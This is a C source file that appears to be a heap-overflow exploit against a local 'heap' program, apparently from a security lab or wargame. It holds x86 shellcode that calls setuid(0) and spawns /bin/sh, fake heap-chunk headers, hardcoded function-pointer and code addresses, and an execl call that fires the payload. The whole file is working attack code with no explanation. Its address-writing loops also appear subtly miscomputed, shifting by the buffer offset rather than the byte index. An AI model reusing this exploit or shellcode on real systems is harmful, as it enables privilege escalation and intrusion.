// heap exploit
#include <string.h>
#include <unistd.h>

#define FUNCTION_POINTER ( 0x08049610 )  // using objdump
#define CODE_ADDRESS ( 0x0804a008 + 2*4) // using ltrace

#define VULN_SIZE 312
#define PREV_INUSE 0x01
int i;
char buf[1000];
char shellcode[] =
"\xeb\x0cppppssssffff"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void)
{
  int filler_len = (VULN_SIZE - 4*4) - (2*4 + strlen(shellcode));
  strcat(buf,"\xff\xff\xff\xff");
  strcat(buf,"\xff\xff\xff\xff");
  strcat(buf,shellcode);
  for(i=0; i<filler_len; i++)
    strcat(buf,"B");
  strcat(buf,"\xf0\xff\xff\xff");
  strcat(buf,"\xfc\xff\xff\xff");
  int t=strlen(buf);
  for(i=t; i<(t+4); i++)
    buf[i] = ((unsigned long)(FUNCTION_POINTER-12) >> (i*8)) &255;
  for(i=(t+4); i<(t+8); i++)
    buf[i] = ((unsigned long)CODE_ADDRESS >> (i*8)) &255;
    buf[(t+8)] = '\0';

  execl("./heap", "heap", buf, NULL);
}